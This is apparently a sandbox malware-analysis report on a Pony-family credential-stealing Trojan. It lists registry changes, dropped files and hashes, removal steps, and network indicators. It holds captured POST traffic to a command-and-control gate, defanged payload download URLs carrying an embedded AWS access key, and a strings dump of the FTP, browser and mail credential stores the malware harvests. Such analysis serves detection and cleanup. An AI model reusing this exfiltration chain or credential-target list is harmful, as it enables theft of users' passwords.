[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Application Data]
"wilk.exe" = "WindowsApplication1"
"msv.exe" = "msv"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Application Data]
"p.exe" = "p"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process ie.exe:1472 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "15 97 EA A0 F7 6D 35 E5 6F 6F 65 46 33 7A 97 6A"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%WinDir%\TEMP\IE9B6.tmp\SQMAPI.DLL,"
Dropped PE files
MD5 | File path |
---|---|
2b00be8eea30b151d5a1b84e0ce0b134 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\msv.exe |
ac2dc3101f04217a7298be46988676c9 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\p.exe |
82c072819372b55ecb2009879f35c118 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\wilk.exe |
90d33721af9ecdbd9fb978ebce5107e4 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\ie.exe |
0e552f559edb48ac376a1e54b20996fd | c:\Program Files\Internet Explorer\mswinsck.ocx |
8d714a229560c585556b27aacc23016b | c:\WINDOWS\Temp\IE9B6.tmp\SQMAPI.DLL |
c1e98405fb770e496c32ca1e18ffe93c | c:\WINDOWS\gbclass.dll |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
RegSvr32.exe:744
p.exe:2008
mscorsvw.exe:172
regsvr32.exe:1024
ie.exe:1472
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%WinDir%\gbclass.dll (7386 bytes)
%Program Files%\Internet Explorer\mswinsck.ocx (1312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ie.exe (353954 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\a.dll (16222 bytes)
%Documents and Settings%\%current user%\Application Data\Bactria.xs (2104 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nslB5.tmp\Bactria.dll (2476 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MT4NMF8J\cJZKeOuBrn4kERxqtaUH3fY6323mHUZFJMgTvxaG2iE[1].eot (8346 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ST4Z62GB\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4PQJGD2V\ServiceLogin[1].htm (4462 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ST4Z62GB\logo_2x[1].png (3393 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4PQJGD2V\DXI1ORHCpsQm3Vp6mXoaTXZ2MAKAc2x4R1uOSeegc5U[1].eot (8343 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MT4NMF8J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ST4Z62GB\avatar_2x[1].png (46 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4PQJGD2V\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\C2HNYZ3R\logo_strip_2x[1].png (4739 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@accounts.google[2].txt (712 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (2728 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\C2HNYZ3R\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\C2HNYZ3R\universal_language_settings-21[1].png (199 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@accounts.google[1].txt (950 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MT4NMF8J\ServiceLogin[1].htm (5907 bytes)
%Documents and Settings%\%current user%\Application Data\p.exe (2452 bytes)
%Documents and Settings%\%current user%\Application Data\wilk.exe (182 bytes)
%Documents and Settings%\%current user%\Application Data\nf.xpi (863 bytes)
%Documents and Settings%\%current user%\Application Data\msv.exe (29851 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\ienrcore.exe (3574 bytes)
%WinDir%\Temp\IE9B6.tmp\SQMAPI.DLL (141 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17514.mum (472 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.16562.cat (14 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17105.mum (1 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7600.16385.cat (14 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17514.cat (20 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17105.cat (1270 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.16562.cat (830 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17514.cat (1404 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17077.mum (1 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-neutral.Extracted.cab (132160 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17077.cat (9 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\NrPolicy.txt (1316 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7600.16385.mum (1 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\trustedinstaller.exe.manifest (803 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17077.mum (1 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\ieinfra.manifest (374 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7600.16385.cat (11 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17077.cat (20 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.16562.mum (1 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17105.mum (1 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17105.cat (11 bytes)
%WinDir%\IE9_main.log (3233 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.16562.mum (1 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support.cab (121 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7600.16385.mum (1 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17514.mum (1 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"internet" = "explorer C:\"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"msv.exe" = "%Documents and Settings%\%current user%\Application Data\msv.exe"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name: fewfwefewfwe
Product Name: j45j54j445j4j45
Product Version: 1.0.0.11
Legal Copyright: wefwefwe
Legal Trademarks: 22h4j4
Original Filename: jh45j4j5
Internal Name: fewfwfwefwef
File Version: 8.9.4.1
File Description: fwefwefewfwefwef
Comments:
Language: Language Neutral
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
CODE | 4096 | 240984 | 241152 | 4.48485 | 80c75e8093f230761f1e69dd2b7e30b9 |
DATA | 245760 | 5400 | 5632 | 3.15243 | 44bca2130f0a4e25d41c9968603fbb54 |
BSS | 253952 | 3149 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.idata | 258048 | 4322 | 4608 | 3.24333 | c6c5aba65d4c07941894e6c14e74fa0b |
.reloc | 266240 | 21236 | 21504 | 4.58401 | 4cd4e2eda34f697f185f673ac43abcb4 |
.rsrc | 290816 | 15872 | 15872 | 2.59079 | 9268e3b3f22a4543ec6aed9b4ec6bb83 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://84.201.32.74/pony/gate.php | |
hxxp://ge.tt/api/1/files/71MPY782/0/blob?download | 54.195.252.180 |
hxxp://open.ge.tt/1/files/71MPY782/0/blob?download | |
hxxp://s3-3-w.amazonaws.com/gett/71MPY782/modulo?response-content-disposition=attachment;&AWSAccessKeyId=AKIAI7XHZJPL62V2UOVA&Signature=aaqxkxBvNuGMZHOPceIH+TTA3Ug=&Expires=1421431475 | |
hxxp://ge.tt/api/1/files/7Pbxr582/0/blob?download | 54.195.252.180 |
hxxp://open.ge.tt/1/files/7Pbxr582/0/blob?download | |
hxxp://s3-3-w.amazonaws.com/gett/7Pbxr582/MSWINSCK.OCX?response-content-disposition=attachment;&AWSAccessKeyId=AKIAI7XHZJPL62V2UOVA&Signature=chisXchTVSIgeHHvcCSonuUKCy0=&Expires=1421431482 | |
hxxp://a767.dscms.akamai.net/download/7/B/D/7BD95543-D8A7-474F-8A79-34DE266AAC27/IE9-Windows7-x86-ptb.exe | |
hxxp://s3.kkloud.com.s3.amazonaws.com/gett/71MPY782/modulo?response-content-disposition=attachment;&AWSAccessKeyId=AKIAI7XHZJPL62V2UOVA&Signature=aaqxkxBvNuGMZHOPceIH+TTA3Ug=&Expires=1421431475 | 54.231.136.26 |
hxxp://w865553.open.ge.tt/1/files/71MPY782/0/blob?download | 54.247.122.87 |
hxxp://w007363.open.ge.tt/1/files/7Pbxr582/0/blob?download | 54.247.122.87 |
hxxp://download.microsoft.com/download/7/B/D/7BD95543-D8A7-474F-8A79-34DE266AAC27/IE9-Windows7-x86-ptb.exe | 72.246.43.8 |
hxxp://bigbone10.info/pony/gate.php | |
hxxp://s3.kkloud.com.s3.amazonaws.com/gett/7Pbxr582/MSWINSCK.OCX?response-content-disposition=attachment;&AWSAccessKeyId=AKIAI7XHZJPL62V2UOVA&Signature=chisXchTVSIgeHHvcCSonuUKCy0=&Expires=1421431482 | 54.231.136.26 |
mail.google.com | 74.125.226.85 |
ssl.gstatic.com | 74.125.226.79 |
paco2015.ddns.net | 65.181.118.218 |
accounts.google.com | 173.194.76.84 |
fonts.gstatic.com | 173.194.68.94 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
POST /pony/gate.php HTTP/1.0
Host: bigbone10.info
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: 432
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
HTTP/1.1 404 Not Found
Date: Fri, 16 Jan 2015 17:59:56 GMT
Server: Apache
Content-Length: 275
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /pony/gate.php was not found on this server.</p>.<hr>.<address>Apache Server at bigbone10.info Port 80</address>.</body></html>...
POST /pony/gate.php HTTP/1.0
Host: bigbone10.info
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: 432
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
HTTP/1.1 404 Not Found
Date: Fri, 16 Jan 2015 17:59:45 GMT
Server: Apache
Content-Length: 275
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /pony/gate.php was not found on this server.</p>.<hr>.<address>Apache Server at bigbone10.info Port 80</address>.</body></html>...
POST /pony/gate.php HTTP/1.0
Host: bigbone10.info
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: 432
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
HTTP/1.1 404 Not Found
Date: Fri, 16 Jan 2015 17:59:50 GMT
Server: Apache
Content-Length: 275
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /pony/gate.php was not found on this server.</p>.<hr>.<address>Apache Server at bigbone10.info Port 80</address>.</body></html>...
GET /api/1/files/71MPY782/0/blob?download HTTP/1.1
Host: ge.tt
Connection: Keep-Alive
HTTP/1.1 307 Temporary Redirect
location: hXXp://w865553.open.ge.tt/1/files/71MPY782/0/blob?download
Connection: keep-alive
Transfer-Encoding: chunked
0......
GET /api/1/files/7Pbxr582/0/blob?download HTTP/1.1
Host: ge.tt
HTTP/1.1 307 Temporary Redirect
location: hXXp://w007363.open.ge.tt/1/files/7Pbxr582/0/blob?download
Connection: keep-alive
Transfer-Encoding: chunked
0..
GET /download/7/B/D/7BD95543-D8A7-474F-8A79-34DE266AAC27/IE9-Windows7-x86-ptb.exe HTTP/1.1
Host: download.microsoft.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Tue, 08 Mar 2011 16:50:16 GMT
Accept-Ranges: bytes
ETag: "9c61fee6b0ddcb1:0"
Server: Microsoft-IIS/8.0
Content-Disposition: attachment
Content-Length: 18666800
Date: Fri, 16 Jan 2015 18:00:15 GMT
Connection: keep-alive
GET /1/files/71MPY782/0/blob?download HTTP/1.1
Host: w865553.open.ge.tt
Connection: Keep-Alive
HTTP/1.1 307 Temporary Redirect
location: hXXp://s3.kkloud.com.s3.amazonaws.com/gett/71MPY782/modulo?response-content-disposition=attachment;&AWSAccessKeyId=AKIAI7XHZJPL62V2UOVA&Signature=aaqxkxBvNuGMZHOPceIH+TTA3Ug=&Expires=1421431475
connection: keep-alive
transfer-encoding: chunked
0..HTTP/1.1 307 Temporary Redirect..location: hXXp://s3.kkloud.com.s3.amazonaws.com/gett/71MPY782/modulo?response-content-disposition=attachment;&AWSAccessKeyId=AKIAI7XHZJPL62V2UOVA&Signature=aaqxkxBvNuGMZHOPceIH+TTA3Ug=&Expires=1421431475..connection: keep-alive..transfer-encoding: chunked..0..
GET /gett/71MPY782/modulo?response-content-disposition=attachment;&AWSAccessKeyId=AKIAI7XHZJPL62V2UOVA&Signature=aaqxkxBvNuGMZHOPceIH+TTA3Ug=&Expires=1421431475 HTTP/1.1
Host: s3.kkloud.com.s3.amazonaws.com
Connection: Keep-Alive
HTTP/1.1 200 OK
x-amz-id-2: ER3qduBuOtTHZsiy6kvZfJiqpYM 1pe1huMNfRFLM fDEW30G/2N8pXXGB2KHtLnrWihtk2q84w=
x-amz-request-id: 51861B5045830B3C
Date: Fri, 16 Jan 2015 17:59:54 GMT
Content-Disposition: attachment;
Last-Modified: Wed, 14 Jan 2015 14:49:40 GMT
ETag: "23fdcb8fdaf546b5884e31efad4d5711-1"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Content-Length: 1351680
Server: AmazonS3
GET /gett/7Pbxr582/MSWINSCK.OCX?response-content-disposition=attachment;&AWSAccessKeyId=AKIAI7XHZJPL62V2UOVA&Signature=chisXchTVSIgeHHvcCSonuUKCy0=&Expires=1421431482 HTTP/1.1
Host: s3.kkloud.com.s3.amazonaws.com
HTTP/1.1 200 OK
x-amz-id-2: xUwL2Dp4fTDppWyne6Xs/XKnAuLZg3pknIIfT0mVztfcQKSV73H4LO9L1r4vI1wbMvadtWBcpfY=
x-amz-request-id: 0F3CB638CF0CD829
Date: Fri, 16 Jan 2015 18:00:00 GMT
Content-Disposition: attachment;
Last-Modified: Wed, 07 Jan 2015 01:08:59 GMT
ETag: "0e03064e0247e969aa256eaf1bf4ddc5-1"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Content-Length: 126800
Server: AmazonS3
GET /1/files/7Pbxr582/0/blob?download HTTP/1.1
Host: w007363.open.ge.tt
Connection: Keep-Alive
HTTP/1.1 307 Temporary Redirect
location: hXXp://s3.kkloud.com.s3.amazonaws.com/gett/7Pbxr582/MSWINSCK.OCX?response-content-disposition=attachment;&AWSAccessKeyId=AKIAI7XHZJPL62V2UOVA&Signature=chisXchTVSIgeHHvcCSonuUKCy0=&Expires=1421431482
connection: keep-alive
transfer-encoding: chunked
0..
POST /pony/gate.php HTTP/1.0
Host: bigbone10.info
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: 432
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
HTTP/1.1 404 Not Found
Date: Fri, 16 Jan 2015 17:59:39 GMT
Server: Apache
Content-Length: 275
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /pony/gate.php was not found on this server.</p>.<hr>.<address>Apache Server at bigbone10.info Port 80</address>.</body></html>...
Map
The Trojan connects to the servers at the following location(s):
Strings from Dumps
msv.exe_1820:
ole32.dll
ole32.dll
comctl32.dll
comctl32.dll
winspool.drv
winspool.drv
URLMON.DLL
URLMON.DLL
URLDownloadToFileW
URLDownloadToFileW
shell32.dll
shell32.dll
windowscodecs.dll
windowscodecs.dll
uxtheme.dll
uxtheme.dll
DWMAPI.DLL
DWMAPI.DLL
1$1$0,0004080
1$1$0,0004080
>#>'> >/>3>
>#>'> >/>3>
7#7'7 7/73777
7#7'7 7/73777
0D1r1D3H3L3P3T3X3\3`3d3h3l3p3t3%4U4>6
0D1r1D3H3L3P3T3X3\3`3d3h3l3p3t3%4U4>6
7v7D7}7
7v7D7}7
0-0K0Y0g0}0
0-0K0Y0g0}0
=(=,=
=(=,=
>~> ?@?[?
>~> ?@?[?
7v7D7
7v7D7
8"8&8*8.828
8"8&8*8.828
?$?[?_?}?
?$?[?_?}?
3
3loginsorigin_urlpassword_value\Google\Chrome\ChromePlusSoftware\ChromePlus\NichromeStaff-FTPSM.archFreshFTPBlazeFtpsite.datLastPasswordLastPortSoftware\FlashPeak\BlazeFtp\Settings\BlazeFtpFTP .Link\shell\open\commandGoFTPConnections.txt3D-FTP\3D-FTPSOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32EasyFTPpassword 51:b:FTP NowFTPNowSOFTWARE\Robo-FTP 3.7\ScriptsSOFTWARE\Robo-FTP 3.7\FTPServersFTP CountFTP File%d2.5.29.37Software\LinasFTP\Site Manager.duckuser.configNppFTP.xmlFTP destination serverFTP destination userFTP destination passwordFTP destination portFTP destination catalogFTP profilesFTPShellftpshell.fsiSoftware\MAS-Soft\FTPInfo\Setup\FTPInfoServerList.xmlftpsite.iniFTPList.db\MapleStudio\ChromePlusSoftware\Nico Mak Computing\WinZip\FTPMy FTPproject.ini{74FF1730-B1F2-4D88-926B-1568FAE61DB7}NovaFTP.db\INSoftware\NovaFTP.oeaccount\Microsoft\Windows Live MailSoftware\Microsoft\Windows Live Mail\Microsoft\Windows MailSoftware\Microsoft\Windows MailMailbox.ini\PocoSystem.iniaccounts.iniPopPortPopPasswordSmtpServerSmtpPortSmtpAccountSmtpPasswordaccount.cfgaccount.cfnDir #%dSMTP Email AddressSMTP ServerSMTP User NameHTTP UserHTTP Server URLHTTPMail User NameHTTPMail ServerSMTP UserPOP3 PortSMTP PortIMAP PortPOP3 Password2IMAP Password2NNTP Password2HTTPMail Password2SMTP Password2POP3 PasswordIMAP PasswordNNTP PasswordHTTP PasswordSMTP PasswordSoftware\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet SettingsSoftware\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlookinetcomm server passwordsoutlook account manager passwordsSTATUS-IMPORT-OK%d.batShellExecuteAshell32.dll;3 #>6.&'2, / 0&7!4-)1#GetWindowsDirectoryAuser32.dllRegOpenKeyExARegCloseKeyRegOpenKeyARegEnumKeyExARegCreateKeyAInternetCrackUrlAInternetCreateUrlAwininet.dllshlwapi.dllwsock32.dlluserenv.dll2hXXp://VVV.facebook.com/xthpt/:w/wwf.cabeoo.koc/m3Q3b3r3>